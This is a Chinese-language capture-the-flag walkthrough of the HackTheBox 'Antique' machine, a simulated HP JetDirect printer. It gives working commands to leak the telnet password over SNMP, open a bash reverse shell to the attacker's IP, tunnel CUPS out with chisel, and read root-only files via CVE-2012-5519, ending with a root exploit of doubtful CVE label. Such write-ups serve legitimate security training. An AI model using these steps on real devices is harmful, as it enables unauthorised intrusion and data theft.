HackTheBox-Antique

---

title: HackTheBox-Antique author: Mosaic Theory layout: true categories: 漏洞实验 tags:

• • 打靶日记

---

Doubt is the key to knowledge.

怀疑是知识的钥匙。

HackTheBox-Antique

Recon:

Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-16 04:48:00 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 23/tcp on 10.10.11.107                                    
Discovered open port 161/udp on 10.10.11.107  

>> sudo nmap -sC -sV -Pn -T4 10.10.11.107 -p23,161                  
[sudo] mosaictheory 的密码：
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-16 13:04 CST
Nmap scan report for 10.10.11.107
Host is up (0.15s latency).

PORT    STATE  SERVICE VERSION
23/tcp  open   telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect
161/tcp closed snmp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.92%I=7%D=5/16%Time=6281DB52%P=x86_64-pc-linux-gnu%r(NULL
SF:,F,"nHPx20JetDirectnn")%r(GenericLines,19,"nHPx20JetDirectnnPas
SF:sword:x20")%r(tn3270,19,"nHPx20JetDirectnnPassword:x20")%r(GetReq
SF:uest,19,"nHPx20JetDirectnnPassword:x20")%r(HTTPOptions,19,"nHPx2
SF:0JetDirectnnPassword:x20")%r(RTSPRequest,19,"nHPx20JetDirectnnPa
SF:ssword:x20")%r(RPCCheck,19,"nHPx20JetDirectnnPassword:x20")%r(DNS
SF:VersionBindReqTCP,19,"nHPx20JetDirectnnPassword:x20")%r(DNSStatusR
SF:equestTCP,19,"nHPx20JetDirectnnPassword:x20")%r(Help,19,"nHPx20J
SF:etDirectnnPassword:x20")%r(SSLSessionReq,19,"nHPx20JetDirectnnPa
SF:ssword:x20")%r(TerminalServerCookie,19,"nHPx20JetDirectnnPassword:
SF:x20")%r(TLSSessionReq,19,"nHPx20JetDirectnnPassword:x20")%r(Kerbe
SF:ros,19,"nHPx20JetDirectnnPassword:x20")%r(SMBProgNeg,19,"nHPx20J
SF:etDirectnnPassword:x20")%r(X11Probe,19,"nHPx20JetDirectnnPasswor
SF:d:x20")%r(FourOhFourRequest,19,"nHPx20JetDirectnnPassword:x20")%r
SF:(LPDString,19,"nHPx20JetDirectnnPassword:x20")%r(LDAPSearchReq,19,
SF:"nHPx20JetDirectnnPassword:x20")%r(LDAPBindReq,19,"nHPx20JetDire
SF:ctnnPassword:x20")%r(SIPOptions,19,"nHPx20JetDirectnnPassword:x
SF:20")%r(LANDesk-RC,19,"nHPx20JetDirectnnPassword:x20")%r(TerminalSe
SF:rver,19,"nHPx20JetDirectnnPassword:x20")%r(NCP,19,"nHPx20JetDire
SF:ctnnPassword:x20")%r(NotesRPC,19,"nHPx20JetDirectnnPassword:x20
SF:")%r(JavaRMI,19,"nHPx20JetDirectnnPassword:x20")%r(WMSRequest,19,"
SF:nHPx20JetDirectnnPassword:x20")%r(oracle-tns,19,"nHPx20JetDirect
SF:nnPassword:x20")%r(ms-sql-s,19,"nHPx20JetDirectnnPassword:x20")
SF:%r(afp,19,"nHPx20JetDirectnnPassword:x20")%r(giop,19,"nHPx20JetD
SF:irectnnPassword:x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 174.70 seconds

是台HP打印机，而且要求我输入密码：

>> telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.

HP JetDirect

Password: admin
Invalid password
Connection closed by foreign host.

HP打印机漏洞学习文章，可以看一眼：

http://www.irongeek.com/i.php?page=security/networkprinterhacking

按博客文章所说，我输入一下命令，目标会返回给我一些十六进制的数字：

>> snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 

看起来像是串密码，后半部分乱码了，但也看着不像是串密码。

>> telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: P@ssw0rd@123!!123
Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session

> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
> exec ls
telnet.py
user.txt
> exec cat user.txt
378............................
> exec bash -c 'bash -i >& /dev/tcp/10.10.16.6/9001 0>&1'

>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.107] 55896
bash: cannot set terminal process group (1015): Inappropriate ioctl for device
bash: no job control in this shell
lp@antique:~$ 

密码无法复用：

lp@antique:~$ sudo -l
[sudo] password for lp: 
Sorry, try again.
[sudo] password for lp: 
Sorry, try again.
[sudo] password for lp: 
sudo: 3 incorrect password attempts
lp@antique:~$ 

还有一个对内窗口：

lp@antique:~$ netstat -tnlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      1023/python3        
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      - 

是个HTTP服务：

lp@antique:~$ nc 127.0.0.1 631
s
HTTP/1.0 400 Bad Request
Date: Mon, 16 May 2022 05:57:56 GMT
Server: CUPS/1.6
Content-Type: text/html; charset=utf-8
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
    <TITLE>Bad Request - CUPS v1.6.1</TITLE>
    <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
</HEAD>
<BODY>
<H1>Bad Request</H1>
<P></P>
</BODY>
</HTML>

lp@antique:~$ curl http://127.0.0.1:631
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
    <TITLE>Home - CUPS 1.6.1</TITLE>
    <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
    <LINK REL="SHORTCUT ICON" HREF="/images/cups-icon.png" TYPE="image/png">
</HEAD>
<BODY>
<TABLE CLASS="page" SUMMARY="{title}">
<TR><TD CLASS="body">
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0" SUMMARY="">
<TR HEIGHT="36">
<TD><A HREF="http://www.cups.org/" TARGET="_blank"><IMG
SRC="/images/left.gif" WIDTH="64" HEIGHT="36" BORDER="0" ALT=""></A></TD>
<TD CLASS="sel"><A HREF="/">&nbsp;&nbsp;Home&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/admin">&nbsp;&nbsp;Administration&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/classes/">&nbsp;&nbsp;Classes&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/help/">&nbsp;&nbsp;Online&nbsp;Help&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/jobs/">&nbsp;&nbsp;Jobs&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/printers/">&nbsp;&nbsp;Printers&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel" WIDTH="100%"><FORM ACTION="/help/" METHOD="GET"><INPUT
TYPE="SEARCH" NAME="QUERY" SIZE="20" PLACEHOLDER="Search Help"
AUTOSAVE="org.cups.help" RESULTS="20"></FORM></TD>
<TD><IMG SRC="/images/right.gif" WIDTH="4" HEIGHT="36" ALT=""></TD>
</TR>
</TABLE>

<TABLE CLASS="indent" SUMMARY="">
<TR><TD STYLE="padding-right: 20px;">

<H1>CUPS 1.6.1</H1>

<P>CUPS is the standards-based, open source printing system developed by
<A HREF="http://www.apple.com/">Apple Inc.</A> for OS<SUP>&reg;</SUP> X and
other UNIX<SUP>&reg;</SUP>-like operating systems.</P>

</TD>
<TD><A HREF="http://www.cups.org/"><IMG SRC="images/cups-icon.png" WIDTH="128"
HEIGHT="128" ALT="CUPS"></A></TD>
</TR>
</TABLE>

<TABLE CLASS="indent" SUMMARY="">
<TR><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-right: 20px;">

<H2>CUPS for Users</H2>

<P><A HREF="help/overview.html">Overview of CUPS</A></P>

<P><A HREF="help/options.html">Command-Line Printing and Options</A></P>

<P><A HREF="help/whatsnew.html">What's New in CUPS 1.6</A></P>

<P><A HREF="http://www.cups.org/newsgroups.php?gcups.general">User Forum</A></P>

</TD><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-left: 20px; padding-right: 20px;">

<H2>CUPS for Administrators</H2>

<P><A HREF="admin">Adding Printers and Classes</A></P>

<P><A HREF="help/policies.html">Managing Operation Policies</A></P>

<P><A HREF="help/accounting.html">Printer Accounting Basics</A></P>

<P><A HREF="help/security.html">Server Security</A></P>

<P><A HREF="help/kerberos.html">Using Kerberos Authentication</A></P>

<P><A HREF="help/network.html">Using Network Printers</A></P>

<P><A HREF="help/ref-cupsd-conf.html">cupsd.conf Reference</A></P>

<P><A HREF="http://www.cups.org/ppd.php">Find Printer Drivers</A></P>

</TD><TD VALIGN="top" STYLE="padding-left: 20px;">

<H2>CUPS for Developers</H2>

<P><A HREF="help/api-overview.html">Introduction to CUPS Programming</A></P>

<P><A HREF="help/api-cups.html">CUPS API</A></P>

<P><A HREF="help/api-filter.html">Filter and Backend Programming</A></P>

<P><A HREF="help/api-httpipp.html">HTTP and IPP APIs</A></P>

<P><A HREF="help/api-ppd.html">PPD API</A></P>

<P><A HREF="help/api-raster.html">Raster API</A></P>

<P><A HREF="help/ref-ppdcfile.html">PPD Compiler Driver Information File Reference</A></P>

<P><A HREF="http://www.cups.org/newsgroups.php?gcups.development">Developer Forum</A></P>

</TD></TR>
</TABLE>

</TD></TR>
<TR><TD>&nbsp;</TD></TR>
<TR><TD CLASS="trailer">CUPS and the CUPS logo are trademarks of
<A HREF="http://www.apple.com">Apple Inc.</A> CUPS is copyright 2007-2012 Apple
Inc. All rights reserved.</TD></TR>
</TABLE>
</BODY>
</HTML>
lp@antique:~$ 

把代码复制到本地尝试打开一下：

一个管理页面，或许可以通过隧道将其映射出来：

>> ./chisel server -p 9000 --reverse
2022/05/16 14:13:22 server: Reverse tunnelling enabled
2022/05/16 14:13:22 server: Fingerprint fjUE8y6Ox68a6MUhAhdm1+2Lx2FF4rSO2OXMhsIcdKM=
2022/05/16 14:13:22 server: Listening on http://0.0.0.0:9000

lp@antique:~$ ./chisel client 10.10.16.6:9000 R:9002:localhost:631
2022/05/16 06:15:26 client: Connecting to ws://10.10.16.6:9000
2022/05/16 06:15:28 client: Connected (Latency 119.909414ms)

CVE-2012-5519：

配置文件可以尝试更改，但他要求我输入密码，我没有，它就会被记录在错误日志中：

在帮助页面会有版本信息：

Google会搜到一个任意文件读取的漏洞。在Metasploit中会有该漏洞利用脚本：

https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/escalate/cups_root_file_read.rb

defaults = cmd_exec(ctl_path)
    @web_server_was_disabled = defaults =~ /^WebInterface=no$/i

    # first we set the error log to the path intended
    cmd_exec("#{ctl_path} ErrorLog=#{datastore['FILE']}")
    cmd_exec("#{ctl_path} WebInterface=yes")
    @error_log_was_reset = true

    # now we go grab it from the ErrorLog route
    file = strip_http_headers(get_request('/admin/log/error_log'))

    # and store as loot
    f = File.basename(datastore['FILE'])
    loot = store_loot('cups_file_read', 'application/octet-stream', session, file, f)
    print_good("File #{datastore['FILE']} (#{file.length} bytes) saved to #{loot}")
  end

简单来说，我可以更改错误日志的路径，因为在打印机web页面我是管理员权限，本就可以读取错误日志信息，我把错误日志路径改成root.txt然后再通过web页面去读取错误日志就能够获取到root.txt：

lp@antique:~$ cupsctl ErrorLog=/root/root.txt
lp@antique:~$ curl 127.0.0.1:631/admin/log/error_log? 
c......................................

CVE-2021-2043：

lp@antique:~$ python3 CVE-2021-2043.py 
# id
uid=0(root) gid=0(root) groups=0(root),7(lp),19(lpadmin)
# 

原文始发于微信公众号（老鑫安全）：HackTheBox-Antique